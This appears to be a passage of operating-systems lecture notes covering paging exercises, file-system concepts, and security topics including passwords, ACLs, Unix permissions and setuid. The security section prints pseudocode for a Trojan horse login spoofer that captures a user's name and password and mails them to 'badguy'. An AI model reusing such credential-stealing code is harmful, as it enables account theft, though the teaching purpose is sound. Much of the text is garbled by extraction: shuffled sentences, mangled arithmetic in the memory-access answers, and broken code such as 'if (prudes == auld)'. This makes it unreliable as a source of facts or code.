In general. can run into double caching. Must maintain enough information on disk to recover from crashes. An important issue for file systems is crash recovery. 8K page tables imply that the offset takes up 13 bits. so should keep it resident locally. Eject a page. In effect. Especially useful for /tmp o Files. • An old Homework problem Consider a virtual memory system with 32 bit addresses and 8 KB pages. modifications must be carefully sequenced to leave disk in a recoverable state at all times. But. (Note that 1MB = 1048576 bytes) Now consider the same process in a two level paging system with the same size pages. and it gets written back to file.may be read in the near future.keep in memory for a short time. How much memory does this page table consume for the same process? Answer: The first page table takes the same amount of space for all processes. Consider a process that has allocated the top and bottom 128 MB of its address space. Maybe file is deleted.if use file system as backing store. This system also has virtual memory hardware cache on the processor. each secondary page addresses 4194304 (4MB) of data. So. The entire 32 bit address space is available to processes. but two page identifiers of 10 and 9 bits for the first and second level of the page table. Each secondary page table addresses 29 = 512 pages. The second page table requires one main page table of 210 2 byte entries. Another old homework problem Consider a virtual memory system. Or. Fix this by not caching backing store files. which takes up 2048 bytes (or 2KB). The hit rates and service times for the layers of the memory system are: • • Caching level Hit Rate Service Time CPU Cache 90% 1ns 150 . One common problem with file caches . The whole page table takes 2048 + 64 ´ 1024 = 67584 or 68KB. and there is one level of page table. Each page table entry is 2 bytes long. file caching interferes with performance of the virtual memory system. Each 128 MB of data requires 32 secondary pages for a total of 64 secondary pages each of 29 2 byte entries (1024 bytes). Because each page is 8K. depends on needs of the system. How much memory does its page table use.o Yes . leaving 19 bits for the page identifier.do you keep data written back to disk in the file cache? Probably . and can get big performance improvements. or can give disk scheduler more flexibility. disk blocks from recently written files may be cached in memory in the file cache. • • One more question . so don't ever need to use disk at all. can batch up lots of small writes into a larger write. There are 219 two byte entries which is 220 = 1048576 bytes (or 1MB).

002m sake the increased hit rate. 9(1 ´ 10-9) + 0.1*0. More than that they organize and protect data. the time to serve a cache miss that is in main memory is the service time of the cache plus the service time of the memory. The service time must be paid to determine that the item you want is not at this level. Which improves memory performance more.5% 10ns So the average memory access time is access time = 0.9 ns lookup time) or increasing the main memory hit rate by 5% (to 80%) by choosing a better page replacement algorithm? Calculate the average memory access time for both changes. 1(10 ´ 10-9) + 0. 025(10 ´ 10-3) = 250. 151 . and provide a clean interface to allow manipulation of that data. File Systems File systems provide applications with permanent storage. 02(10 ´ 10-3) = 200.5% of all memory references. 1(10 ´ 10-9) + 0. improving the processor cache service time by 10% (a 0. 9(1 ´ 10-9) + 0. 02(1 ´ 10-9 + 10 ´ 10-9 + 10 ´ 10-3) = 1(1 ´ 10-9) + 0. 002m s Reducing cache service time to 0. 075(0. What is the average service time of a memory access on this machine? Note that the service time for a layer is paid for a hit or a miss.75) 7. so a main memory hit is (0. 025(1 ´ 10-9 + 10 ´ 10-9 + 10 ´ 10-3) = 1(1 ´ 10-9) + 0. 9 ´ 10-9) + 0. 0019m s Increasing main memory hit rate to 80% gives: access time = 0. 002 ´ 10-9 = 200. 002 ´ 10-9 = 250.• • Main Memory 75% 1microsecond Page Fault (includes 100% 10 milliseconds translation and retrieval) The layers are tried in order.1*0. 9 ´ 10-9 + 10 ´ 10-9 + 10 ´ 10-3) = 1(0. 025(10 ´ 10-3) = 250. 075( ´ 10-9 + 10 ´ 10-9) + 0. 08(1 ´ 10-9 + 10 ´ 10-9) + 0. Answer: Absolute rates are: Caching level Total Hit Rate Service Time Cache 90% 1 ns Main Memory (0. so a main memory hit only occurs on a cache miss. 9 ´ 10-9) + 0. 0019 ´ 10-9 = 250. It’s no exaggeration to say that providing a file system is one of the major services of general purpose operating systems. 1(10 ´ 10-9) + 0. 9 ´ 10-9 + 10 ´ 10-9) + 0. (Even the palm pilot has permanent storage). 9(0. and less general ones as well.9 ns gives a memory access time of: access time = 0.25*1) = 2.1*0. 025(0.5% 10 ns Page Fault (0.75) = 7.

Memory used in calculating intermediate results doesn’t have that attribute. tapes. So it is with computers. however. named collection of bytes is easy enough to grasp. and more esoteric media. loosely connected local area networks (the Network File System (NFS)) and even global name spaces (the Andrew File System (AFS)). 152 . but your generation will only see that in museums. Persistence implies that the bytes have a meaning that extends in time. hardware-independent. Naming information and the operations thereon is the heart of computer science. This saves a lot of programmer time. This is a seemingly simple function that turns out to be enormously powerful. although several others are making bids. the file system has to impose ideas of user identity and related privileges on the data. The access operations generally impose an order on the bits. files on different operating systems can be remarkably different. By definition. flash memory1. code that manipulates files on one medium will work on others. files are stored on more permanent media. and there are obvious drawbacks to trying to move to a byte at the front of a tape to the back. file systems provide a way to name files. Magicians and conjurers have long believed that to know a thing’s name gives a person power over that thing. There are obvious exceptions . As a result. named. The same operations are generally allowed on files regardless of the underlying storage medium. Finally. or will eventually. 2.2 File systems provide ways to name files that span multiple media on the same machine (the UNIX® file system).Files A file is a persistent. as we’ll see. CD-ROMS. protected collection of bits and a collection of operations that can be executed on them.you can write to a CDROM at most once. Because the data in files has this long term significance. Providing a name space outside the confines of memory addresses allows processes to share data and communicate. In general. the Devil is in the details. The File Abstraction Although the idea of an abstract. the most common medium is still magnetic disk. So does core memory. Because files are outside memory. We’ll discuss the variations in the file abstraction along the following axes: • • • • • Naming Data Structure and Access Patterns File Types Attributes Operations 1. The attributes attributes define what files are used for. files are largely medium-independent. These days. One wouldn’t store the memory used in a computation in a file because it has no long-term use. Basically anything that can hold information permanently and be read by a computer has held a file system. Flash memory holds the data stored in it even when the power is off. Some other media that can contain files are memory. Despite the fairly simple idea of what a file is. they are also outside the protection of the memory protection system3.

The operating system defines what characters are valid in file names. For example files under some operating systems consist of records. Under UNIX the restraints are minor . Translation between formats or adding a new format is frequently difficult. but internally ignores case.) Different operating systems depend to differing extents on the structure of the file names. Many people think of record-based files as database entries. Arranging a file as records implies the existence of a schema (or description of the record) either embedded in the file in a manner that the OS can read or separately in the system (perhaps elsewhere in the file system). Naming A file generally has a name. Rather than reading single bytes or seeking to arbitrary offsets. We will discuss the details of this when we discuss implementation of File systems. like Mulitcs does. and any equivalence classes between them. Record-based files may display an ordering that is independent of the way the bits are ordered on the underlying storage medium. place additional structure on files. although it will appear in directory listings spelled as the creator of the file spelled it. File Structure In its simplest form. like compilers. files are always accessed in terms of records. The flip-side of that is that record-based files are less flexible. "file". Unless we put them there. "File". AmigaDOS allows you to specify any capitalization. and "File" all refer to the same file. although the behavior can be overridden.4 Beyond the character set. Record-based files impose a structure on the data and allows the operating system to keep that structure intact. Another common type of record based file was the card file . however. place varying degrees of emphasis on file names. MSDOS defines an executable file by its extension.3. Even then the initial permissions on the memory segments are derived from the files themselves. 153 . The records can be fixed length or variable. MSDOS limits the character set to uppercase letters and a few symbols (letters are converted to uppercase in all file names). a file is a collection of ordered bytes. For example gcc uses the file extension to determine which of the languages it supports should be used to compile the source file. (Systems other than MS-DOS have the idea of an extension. Other programs. often called a flat file. a string of bits that (usually) correspond to human-readable letters. For example. or a naming convention for related files. or of printer lines. and that’s one common use of them. while UNIX generally takes it as a hint. The internal structure of the file may reflect this possibility and be significantly more complex than a flat file. Some systems. UNIX allows any byte except hex 0x2f (ASCII for /) to appear in a filename. or collections of bytes.a file that was a sequence of 80 character records that was the electronic equivalent of a stack of punched cards.filenames can’t contain /5 Compare this to MS-DOS (and the Windows\d\d systems that basically sit atop them) that requires an 8 character file name and three character extension. operating systems impose a structure on the names of files.

flat files are files with 1 byte unformatted records). and their use can be easily controlled.see below) or can be a combination of name. it makes forging a check more difficult. and enforce restrictions. like UNIX and permissions. Records are the fundamental building block of files in such systems in the same way that bytes are the fundamental building blocks of flat files. rely on a combination of filenames. only. The access methods are an abstraction of the underlying hardware.) Record based file systems cannot seek to a specific byte in the file. File Types Files have various uses: they hold data for various programs. Other access methods include read-only for unmodifiable files or indexed. but the application chose to read it sequentially. determining if a file is executable (that is contains a business of discriminating between data types to the similar criteria to differentiate). permissions (another attribute . of course). The reverse cannot be done. If files that can be printed as checks can only be created by a few trusted programs. That means that the operating system allows any access pattern. Windows. a file that supports only sequential access cannot have the bytes read in another order. and other things. (Alternatively. Some operating systems allow the contents of a file to be directly encodes as a file type. Related to the building blocks of the files is the access method that a file supports. These systems generally only care about program that can be run) or not.I should note that record-based access is provided by and enforced by the operating system. Strongly-typed operating systems require file types to be encoded in every file. (Applications use UNIX considers a file executable if the user has the right to execute the file encoded in the permissions and if the file is correctly formatted as an executable. It also makes creating one for a legitimate purpose that the system hasn’t been programmed for more difficult. File types can be an explicit piece of information remembered by the operating system (a file attribute . for record based files that have been sorted multiple ways (the OS must support that. Other general purpose systems. Files on disk or CD-ROM Note well the distinction between an application’s access pattern and the access method allowed by the OS. Formatting is generally checked by 154 . How types are encoded in the system and how rigidly type restrictions are enforced control how type based the file system is. leaving the applications that use them. or ask for a set of bytes that spans a record boundary. An application may read a configuration file that supports random access sequentially. and file contents to provide typing. especially mainframes had strongly-typed systems.see below) and contents. The advantage is that file use. A file system that supports only sequential access requires all files to be read or written from the first to the last byte. As a result files generally have only one function. free-form text intended to be read by humans. Such access methods are appropriate file files residing on a magnetic tape for example. It’s not an application convention (although many applications create the illusion of record-based files in a flat file system. and the procedures that underlie them can be tightly constrained. programs themselves. Older business computers.

Some of it is for internal OS use. readable by members of its group. write. We’ll discuss it in a little while. for example the backup flags. Permissions and Attributes Permissions encode the operations allowable on a file and what users8 are allowed to perform them. that is data about the file itself. group and permissions are interesting as attributes of the file. • • • • • • • • • • owner system file flag hidden flag temporary flag creation time modification time information about the last backup lock information current size maximum size Meta-data is used for a variety of reasons. Consider the UNIX file permissions: each file has an owning user and group. Check out the file command in UNIX for a list of some of the magic numbers used by modern versions of UNIX. Well. but are independent of that data. We will talk more about permissions in a few days. Permissions are a good example: they control what processes may access the underlying data of the file. MS-DOS relies on the file extension and the internal format. How intrinsic types are in the file system is a tradeoff between codifying practices in the OS and allowing adaptability.a magic number in the first few bytes of the file. and not accessible to other users. and the rights to read. Some of it is for human use: a data provenance. but right now. the representations are smaller and the listings less exhaustive. and what users are allowed to perform them. In practice. Attributes are meta-data. the owner. Again. You can think of this as a list of all the possible operations on a file. not a simulation by the application. not the data within it. The ability of the file system to store 155 . this is an OS feature. and execute a file is controlled for each of those entities and other users. processes acting on behalf on what users. For example a file might be readable and writable by its owner. 2. Some other common attributes are: • creator 1. The read system calls return the records in sorted order.

On files that can be randomly accessed. seek allows the calling process to set the current byte (or record). Reading occurs at the current byte/record. or just reserve the name for future action. these give a good feel for file operations. Not all of these are supported by all file systems. collect statistics or do other support work in addition to bringing the data from secondary storage to the processes address space.both data and data about the data is an important aspect of the system. In some file systems. but remaining the file system. Note that reading and writing may cache data. there may be secondary actions associated with this. of course. This shares aspects with write. The ability to delete a file is distinct from (but often related to) the ability to modify its contents. File Operations File operations are a generally simple and intuitive set of operations on files. Your Nachos work should give you an idea about some of the OS set up work that’s done here. For example the make utility would be useless without the meta-data telling the program the relative ages of the files. This may allocate space for the file. This may be an operation on the file or a directory depending on the file system. As I mentioned above. but in cases where the file resides on a medium that has significant startup cost (a robotic tape cabinet) not returning the open call until the file is ready for access is a good idea.) Some systems delay writes or cache data for future reads. operations are implemented in terms of other file operations. Writing occurs at the current byte/record. and that such caches have to be coordinated so that all processes see a consistent version of the file. this provides access. Rename: Change a name of the file in the file system. but includes the idea that the underlying file is changing size. Write: Write some data to the file. Delete: Delete an existing file. The OS may take this opportunity to predict future behavior. but many systems also use the write system call to append data. Still. for example the backup flag). Seek: Files have a notion of the current byte (or record) of the file that will next be accessed. Get/Set Attributes: For those attributes that can be modified directly by users. Like read. Read: Get some data from the file. and should therefore be protected. Create: Create a new file. it’s extraneous. In some sense. (The data and meta-data are updated. Some operating systems use the existence of a file to start a service. some OSes determine whether a write system call causes an append or a write based on the current byte and the length of the buffer written. and that the OS can reclaim the resources allocated to manipulating the file. Close: Let the OS know that the process is done with this file. Strictly this means to change existing data in the file to a new value. Open: This lets the OS know that the current process will be interested in a file soon. Append: Add data to the end of the file. Close is an indication to them that pending writes must be flushed and that cached reads can be discarded. 156 . so the existence of such a file is its most important attribute. Append means that the OS must increase the allocation of storage to the file.

A unified access control system is easier to use and only having one to debug implies that it will be more secure. programs can be linked together in arbitrary ways. and terminal output as a sequential write-only file.when do changes in memory get reflected to the file in secondary storage? The paging system is probably pretty lazy about getting changes out to a file. but the result is a simpler programming model for developers: I/O is file I/O.Memory Mapping Files As we discussed in the memory management unit. the access control mechanisms of files can be directly applied to prevent unauthorized manipulations of the hardware. called pipes. For example. This means that programs can be written to take an input and output file and transparently run interactively or from disk files. the data of running procedures has been added to the list of data accessible through the file system. by introducing memory-resident sequential files that are written by one process and read by another. Furthermore. Raw disk drives or modem devices can only be accessed by privileged users. compared to a file write. Putting Devices in the File System The simple. but writing a whole page to memory on every memory write is probably too slow. or create a pipe. terminal input can be thought of as a sequential read-only file. The easiest way to do this is to make the file on disk (or whatever) the backing store for a segment (or section of a paged VM space) and let the paging system handle the writes. The OS has to do extra work to make a terminal look like a file. it is sometimes convenient to move a file into memory and access it directly there. Recently. so are terminals. modems and printers. All is not a bed of roses. 157 . All of these can be accessed through the familiar file system interface. powerful semantics of files lend themselves to controlling a variety of resources. The big issue here is consistency .nearly every OS resource has a file system interface. UNIX takes this to an extreme . One solution is to keep data about which files are memory mapped (as an attribute) and make associated file reads from the memory system rather than the file. though. Physical disk drives are a special type of file. Hardware has features that are not easily expressed as file operations. Furthermore. and those accesses are controlled by the same system as file accesses.

we don't have the space here to go into the whole question of security policies here. A the other end of the spectrum. and the loss of the contract was so bad the software company also went belly-up. we tend to think of technological tricks. Security As in any other area of software design. As programmers. As this second example illustrates. Threats Any discussion of security must begin with a discussion of threats. but rather authorization to the wrong person. A bad guy deleting a good guy's file could be considered an unauthorized update. such as filling up the disk. After all. they are generally considered in the context of other parts of the OS rather than security and protection. blowing up a computer with a hand grenade is not usually considered an unauthorized update. • • • Unauthorized disclosure. Many years ago. it overlaps with the previous category. The chief financial officer used the system to embezzle millions of dollars and fled the country. No matter how well your OS is designed. The bad guy makes changes he has no right to change. or crashing the system by triggering some bug in the OS. I heard a story about a software firm that was hired by a small savings and loan corporation to build a financial accounting system. The bad guy interferes with legitimate access by other users. In short.CHAPTER 10 DIRECTORIES AND SECURITY The terms protection and security are often used together. Denial of service. and the distinction between them is a bit blurred. At one end. There is a wide spectrum of denial-of-service threats. it is important to distinguish between policies and mechanisms. Before you can start building machinery to enforce policies. discussion of software mechanisms for computer security generally focus on the first two threats. some denial-of-service threats can only be enforced by physical security. tying up the CPU with an infinite loop. In response to these threats counter measures also fall into various categories. Unauthorized updates. how are you going to defend against it? Threats are generally divided in three main categories. Another form of denial-of-service threat comes from unauthorized consumption of resources. but it is also important to realize that a 158 . While there are software defenses against these threats. The losses were so great the S&L went bankrupt. it can't protect my files from his hand grenade. but security is generally used in a broad sense to refer to all concerns about controlled access to facilities. A “bad guy” gets to see information he has no right to see (according to some policy that defines “bad guy” and “right to see”). while protection describes specific technological mechanisms that support security. Unfortunately. Did the accounting system have a good or bad security design? The problem wasn't unauthorized access to information. We will just assume that terms like “authorized access” have some well-defined meaning in a particular context. The situation is analogous to the old saw that every program is correct according to some specification. if you don't know what you're afraid of. you need to establish what policies you are trying to enforce.

it just has to appear to. security is all gone. perhaps some good guys will notice bugs or loopholes and tell you about them so you can fix them. Public Design. name = readALine (). they left a huge wooden horse outside the gates as a “gift” and pretended to sail away.passwd). First. print ("login incorrect"). turnOffEchoing (). If you publish it. the system will generate a legitimate login: message and the user. The Trojan Horse program sends this information to the bad guy. Unable to get in. publishing the algorithm can have beneficial effects. typing his login name and password. Log onto a public terminal and start a program that does something like this: print ("login :").” Second. exit (). thinking he mistyped his password (a common occurrence because the password is not echoed) will try again.” Here's the simplest Trojan Horse program I know of. After the program exits. or checking to make sure those armed guards aren't taking bribes). and have no suspicion that anything was wrong. As soon as anybody learns about the algorithm. prints the message login incorrect and exits. The Trojan Horse Break-in techniques come in numerous forms. A user waking up to the terminal will think it is idle. it gives a kind of all-or-nothing security. wrong story). That's a bad idea for many reasons. One general category of attack that comes in a great variety of disguises is the Trojan Horse scam. decompiling the code. sendMail("badguy". it is usually not that hard to figure out the algorithm. A common mistake is to try to keep a system secure by keeping its algorithms secret. etc. a Trojan Horse is a program that does something useful--or at least appears to do something useful-but also subverts security somehow. which was surrounded by an impenetrable wall. The bad guys probably have already figured out your algorithm and found its weak points. name. Third. log in successfully. In the words of Benjamin Franklin. The name comes from Greek mythology. The ancient Greeks were attacking the city of Troy. The Trojans brought the horse into the city. “Two people can keep a secret if one of them is dead. Note that the Trojan Horse program doesn't actually have to do anything useful. He will attempt to log in. 159 . In software. passwd = readALine (). print ("password:"). by seeing how the system responds to various inputs. Design Principles 1.complete security design must involve physical components (such as locking the computer in a secure building with armed guards outside) and human components (such as a background check to make sure your CFO isn't a crook. Trojan horses are often computer games infected with “viruses. where they discovered that the horse was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops. In the personal computer world.

Be careful: This principle can be overdone. Appropriate Levels of Security. If the login is successful. In other contexts. There are lots of things wrong with it. Users seldom complain about having too much access. The US Strategic Air Defense calls for a different level of security than my records of the grades for this course. called the password that is known to both the server and to legitimate clients. though which a human user convinces the computer system that he has the right to use a particular account. Minimum Privilege. 5. It is also important that the interface to the protection mechanisms be simple. but you also don't keep it in a vault at the bank. There is a value. 4. the longer you use the same password. Default = No Access. Any piece of software should be as simple as possible (but no simpler!) to maximize the chances that it is correctly and efficiently implemented. A person (or program or process) should be given just enough powers to get the job done. The client tells the server who he claims to be and supplies the password as proof. foolproof security policies. Direct attacks on the password The most obvious way of breaking in is a frontal assault on the password. Authentication occurs in other contexts. It is remarkably hard to design good. it is not a very good one.” For example. This is particularly important for protection software. users will go out of their way to avoid using them. Start out by granting as little access a possible and adding privileges only as needed. Timely Checks. In a networking environment. it can actually lead to a less secure system. let's call the party that whats to be authenticated the client and the other party the server. Checks tend to “wear out. Although this is a common technique. The main defense against this attack is the time it takes to try 160 . Not only does excessive security mechanism add unnecessary cost and performance degradation. In general. If the protection mechanisms are too hard to use. A familiar instance is the login process. Authentication Authentication is a process by which one party convinces another of its identity. A system that forced users to supply a password every time they wanted to open a file would inspire all sorts of ingenious ways to avoid the protection mechanism altogether. Systems that force users to change passwords frequently encourage them to use particularly bad ones. Simple.” It implies that the protection mechanism has to support fine-grained control. Sometimes a process needs to authenticate itself to another process. You don't store your best silverware in a box on the front lawn. This is the technique used most often for login. If you forget to grant access where it is legitimately needed. This is an extension of point 2. you'll soon find out about it. policy designers need all the help they can get. One common technique for authentication is the use of a password. easy to understand. since bugs are likely be usable as security loopholes. Uniform Mechanisms. The server compares the supplied password with what he knows to be the true password for that user. 3. this principle is called “need to know. and it isn't always a human being that is being authenticated. a computer may need to authenticate itself to another computer. the higher the likelihood it will be stolen or deciphered.2. 6. Simply try all possible passwords until one works. the system creates a process and associates with it the internal identifier that identifies the account. and easy to use.

so the user will be tempted to write it down or store it in a file. lists of common names. If the bad guy can somehow intercept the information sent from the client to the server. the server has to have it stored somewhere. This is not a problem if the client is not a human being. In order to verify that the password is correct. In comes in many disguises. nobody can find out the password for a given user. It is quite easy to devise functions with these properties. why should the bad guy have access to the password file in the first place?). and in addition. that has since been almost universally copied. If users are allowed to pick their own passwords. names of family members. • • Looking over someone's shoulder while he's typing his password. If the client is a computer program (perhaps masquerading as a human being). etc. it runs a password cracker when the user tries to set his password and rejects the password if the cracker succeeds. password-based authentication breaks down altogether. since the password is sent in its original form (“plaintext” in the jargon of encryption) from the client to the server. One variant of this idea is to hang up a dial-in connection after three unsuccessful login attempts. even with full access to the password file. Besides. It can also use biographical information about the user to narrow the search space. • • Eavesdropping. This has many of the disadvantages of the previous point. This is a far bigger program for passwords than brute force attacks. so that it takes longer to go through lots of possibilities. Unix introduced a clever fix to this problem. Note that the Unix scheme of storing f(password) is of no help here. common words.821. The problem with this is that the password will not be easy to remember. etc. There are several defenses against this sort of attack. it can magnify the effects of an existing security lapse. it has become customary to make the password file publicly readable! Wire tapping. Since only f(password) is stored in the password file.lots of possibilities. When a client sends his password. but by if the password is long enough. this technique is so secure. • The system chooses the password. it should be hard to recover password. they are likely to choose “cute doggie names”. or echo each character as an asterisk to mitigate this problem. it should be very hard to invert--that is. making it easy to steal. If the bad guy can somehow get access to this file. The password check is artificially slowed down. That cuts down the search space considerably. given f(password). 161 • • . not f(password). While this isn't a threat on its own (after all. and logging in requires knowing password. it leads to a sort of arms race between crackers and checkers. It is increasingly the case the authentication occurs over an insecure channel such as a dial-up line or a local-area network. We will consider this problem in more detail below. In effect. The hash function should have two properties: Like any hash function it should generate all possible result values with roughly equal probability.907. there are 2. the server applies f to it and compares the result with the value stored in the password file. he can pose as anybody.109. If the password is a string of 8 letters and digits. Use some hash function f and instead of storing password. it can try lots of combinations very quickly. Reading the password file. In fact. The system rejects passwords that are too “easy to guess”.456 possibilities. A program that tried one combination every millisecond would take 89 years to get through them all. Most systems turn off echoing. A password cracker can go through dictionaries. store f(password). even the fastest computer cannot try succeed in a reasonable amount of time. forcing the bad guy to take the time to redial.

and would have no way to respond. semaphores. the owner of the process. In simple protection systems. the set of operations is quite limited: read. some terminology Objects: The things to which we wish to control access. As in objectoriented programming. but that wouldn't help him pose as the user. It would seem that the server needs to authenticate itself to the client before the client can authenticate itself to the server.x). Challenge-response There are wide variety of authentication protocols. As before.x). or roles. Rights: Permissions to invoke operations. append. It should have the property that it is essentially impossible to figure out password even if you know both x and g(password. Principals: Intuitively.Spoofing This is the worst threat of all. Even a bogus server is no threat. such as “administrator. For example. there's a chicken-and-egg problem here. he can trick the client into divulging his password. 162 . except that it has two arguments. An eavesdropper could learn the user's name. The client computes g(password. perhaps allowing new types and operations to be dynamically defined. Each right is the permission for a particular principal to perform a particular operation on a particular object. or processes. and perhaps execute. write. but they are all based on a simple idea. The server also computes g(password. We saw a form of this attack above. Fortunately. • • • The client sends a message to the server saying who he claims to be and requesting authentication. a bogus client does no harm to a legitimate server except for tying him up in a useless exchange (a denial-of-service problem!). x and g(password. Fancier protection systems support a wider variety of types and operations. The change provides him with no useful information. there's a very clever and general solution to this problem.x) and compares it with the response it got from the client. Principals might be individual persons. we assume that there is a password known to both the (true) client and the (true) server.” Often each process is associated with a particular principal. The server sends a challenge to the client consisting of some random value x. “users”--the ones who do things to objects. groups or projects. and a few others. Similarly.x) and sends it back as the response. Protection Mechanisms First. principal solomon might have read rights for a particular file object. Clearly. They include physical (hardware) objects as well as software objects such as files. • Clearly this algorithm works if both the client and server are legitimate. If he tried to authenticate himself to the server he would get a different challenge x'. Here g is a hash function similar to the function f above. How does the client know that the server is who it appears to be? If the bad guy can pose as the server. databases. each object has a type and supports certain operations as defined by its type. Authentication is a four-step process.

by columns. which is in a particular domain. and by rows. write } Then I have read and write access to file "/tmp/foo". or modify ACL entries. the protection state of a system is defined by an access matrix. write files. Your home directory is in AFS. The mask is composed of three groups of three bits. which are called access control lists (ACLs). I thus have the power to grant or deny any rights to this directory to anybody. I say “conceptually” because the access is never actually stored anywhere. so there are much more compact ways to represent it. Access Control Lists An ACL (pronounced “ackle”) is a list of rights associated with an object. In addition to r and l. It is very large and has a great deal of redundancy (for example. they include the rights to insert new file in the directory (i. The first group indicates the rights of the owner: one bit each for read access. The access information is represented in one of two ways. write access. You can list the ACL of a directory with the fs listacl command: % fs listacl /u/c/s/cs537-1/public Access list for /u/c/s/cs537-1/public is Normal rights: system:administrators rlidwka System:anyuser rl solomon rlidwka The entry system: anyuser rl means that the principal system:anyuser (which represents the role “anybody at all”) has rights r (read files in the directory) and l (list the files in the directory and read their attributes). AFS associates an ACL with each directory. There may be three levels of indirection: A principal owns a particular process. called capability lists.Domains: Sets of rights. Conceptually. The remaining entry in the list shows that the principal system: administrators has the same rights I do (namely. For example. and each cell is a set of rights. Domains may overlap. The inode of each file also contains a uid and a gid. The entry solomon rlidwka means that I have all seven rights supported by AFS. such as the right to modify a particular file. all rights). delete files. create files). This principal is the name of a group of other principals. called the mode of the file. The rows correspond to principals (or domains). which contains a set of rights. This last right is very powerful: It allows me to add. making it easier to make wholesale changes to the access environment of a process.. but the ACL also defines the rights for all the files in the directory (in effect. as well as a nine-bit protection mask. my rights to a vast number of objects are exactly the same: none!). but in a much strippeddown form. the columns correspond to objects.e. delete. if access[solomon]["/tmp/foo"] = { read. Domains are a form of indirection. and administer the ACL list itself. Ordinary Unix also uses an ACL scheme to control access to files. each of which is a 16-bit unsigned integer. and 163 . This file system is widely used in the Computer Sciences Department. The command pts membership system: administrators list the members of the group. lock files. Each process is associated with a user identifier (uid) and a group identifier (gid). they all share the same ACL). A good example of the use of ACLs is the Andrew File System (AFS) originally created at Carnegie-Mellon University and now marketed by Transarc Corporation as an add-on to Unix.

the last three bits are used. On the other hand.) Note that this scheme can actually give a random user more powers over the file than its owner. break.mode. and execute the file. The code might look something like this. and each 1 is represented by r. but not write the file.execute access (the right to run the file as a program).mode shifted right by three bits positions and the operation mode &= 4 clears all but the third bit from the right of mode. case WRITE: mode &= 2. Inode i. A process has a set of gid's. else mode = i. boolean accessOK(Process p. the owner of the file (and only the owner) can execute the chmod system call.gid == i.rather than 0 and 1. or x. it gets the uid and gid of the process that created it. int operation) { 164 . } return (mode != 0). which changes the mode bits to any desired value. and other can both read and write.uid) mode = i. For example. depending on its position. and the check to see whether the file is in the process' group checks to see whether any of the process' gid's match the file's gid. the mode ---r--rw(000 100 110 in binary) means that the owner cannot access the file at all.mode >> 3 denotes the value i. and a mode supplied as an argument to the creat system call. If neither of the id's match.gid) mode = i. w. the mode 111101101 is printed as rwxr-xr-x. Programs that print the mode usually use the characters rwx.mode >> 3. Inode i. the second three bits are checked. For example. Otherwise. In somewhat more detail. break.mode >> 6. Most modern versions of Unix actually implement a slightly more flexible scheme for groups. while members of the owning group and others can read and execute. write. } (The expression i.uid == i. and the remaining three three bits indicate the rights of everybody else. the mode 111 101 101 (0755 in octal) means that the owner can read. int operation) { int mode. while members of the group can only read the file. Each zero in the binary value is represented by a dash. if the gid of the file matches the gid of the process. boolean accessOK (Process p. break. switch (operation) { case READ: mode &= 4. if (p. else if (p. The second group similarly lists the rights of the file's group. For example. the access-checking algorithm is as follows: The first three bits are checked to determine whether an operation is allowed if the uid of the file matches the uid of the process trying to access it. When a new file is created. case EXECUTE: mode &= 1.

Here's how to use the setuid feature to implement this policy. but nobody else has any access to it). case EXECUTE: mode &= 1. break. Write permission is required to create or delete files in the directory. allowing the simple rwx permissions directly supported by Unix to be used to define arbitrarily complicated protection policies. it is following instructions written by the designer of the mail system. For obvious security reasons. the uid of the process is set equal to the uid of the file. make it the owner of /usr/spool/mbox. else if (p. My process can execute this program (because the “execute by anybody” bit is on).(i. else mode = i. only allow him to change it to one of his gid's. break. say /usr/bin/readmail.mode >> 6.gidSet. If a process executes a program stored in a file with the setuid bit set. There are system calls to change the uid or gid of a file. The ‘s’ means that the setuid bit is set. it gets the uid of the process that created it and the gid of the containing directory. suppose you wanted to implement a mail system that works by putting all mail messages in to one big file.. switch (operation) { case READ: mode &= 4.e. the owner mail can read and write the file. it would seem that letting my process pretend to be owned by another user would be a big security hole. break. it suddenly changes its uid to mail so that it has complete access to /usr/spool/mbox. This rather curious rule turns out to be a very powerful feature.mode. “execute” permission is interpreted as the right to get the attributes of files in the directory. but it isn't. and set the mode of the file to rw------. and when it does. While my process is running readmail. One of them is the so-called setuid bit. } When a new file is created.contains(i. say /usr/spool/mbox. At first glance. and don't allow him to change the uid at all. } return (mode != 0). They can only do what the program tells them to do. these operations are highly restricted. so it is safe to let it have access 165 . As an example.gid)) mode = i.mode >> 3. Some versions of Unix only allow the owner of the file to change it gid. case WRITE: mode &= 2. This file is also owned by mail and has mode srwxr-xr-x. yet be able to delete it and replace it with another file of the same name but with different contents! Unix has another very clever feature--so clever that it is patented! The file mode actually has a few more bits that I have not mentioned. For directories. because processes don't have free will. Define a new uid mail. Write a program for reading mail. I should be able to read only those message that mention me in the To: or Cc: fields of the header. This rule leads to the surprising result that you might not have permission to modify a file. if (prudes == auld) mode = i.int mode.

a process has to make a kernel call. When a process tries to open a file for writing. The capability itself is stored in a table in the kernel and the process has only an indirect reference to it (the index of the slot in the table). while another allows both reading and writing. They are an important piece of metadata. however. like segments are a “good idea” that somehow seldom seems to be implemented in real systems in full generality. the kernel checks the checksum to make sure the capability hasn't been tampered with. one capability may permit reading from a particular file. It is the effective uid that is used to determine what rights it has to what files. Capabilities An alternative to ACLs are capabilities. Each time a process presents a capability to the kernel to invoke an operation. a process makes a system call. they cannot be stored in files. To perform an operation on an object. Like segments. but its real uid remains unchanged. The hardware checks that capability words are only assigned from other capability words. Unix uses the separate segment approach to protect the capability. its effective uid changes to the uid of the program. called the effective uid and the real uid. Directories Directories are collections of files. For capabilities to work as a protection mechanism. marking the word as a capability word or a data word. Their primary function is to impose a naming system on files and organize them relative to each other. Separate capability segments If the hardware does not support tagging individual words. To create or modify a capability. the file descriptor for an open file in Unix is a kind of capability. the system checks the file's ACL to see whether the access is permitted. the system has to ensure that processes cannot mess with their contents. capabilities show up in an abbreviated form in many systems. If it is. It designates an object and also contains a set of permitted operations on the object. the OS can protect capabilities by putting them in a separate segment and using the protection features that control access to segments. For example. If a process modifies a capability it cannot modify the checksum to match without access to the key. Readmail can use this system call to find out what user called it. Directories provide a mechanism for collecting the names of Files together so that a user and find the file(s) they’re interested in. Only the kernel knows the key. Encryption Each capability can be extended with a cryptographic checksum that is computed from the rest of the content of the capability and a secret key. because they go away when the process terminates. File descriptors are not full-fledged capabilities. There are three distinct ways to ensure the integrity of a capability. which is a sort of capability to the file that permits write operations. For example. For example. and then only show the appropriate messages. A capability is a “protected pointer” to an object. presenting a capability that points to the object and permits the desired operation. When a process executes a setuid program. Tagged architecture Some computers associate a tag bit with each word of memory. A process really has two lid’s. Capabilities. the process gets a file descriptor for the open file. There's one more feature that helps readmail 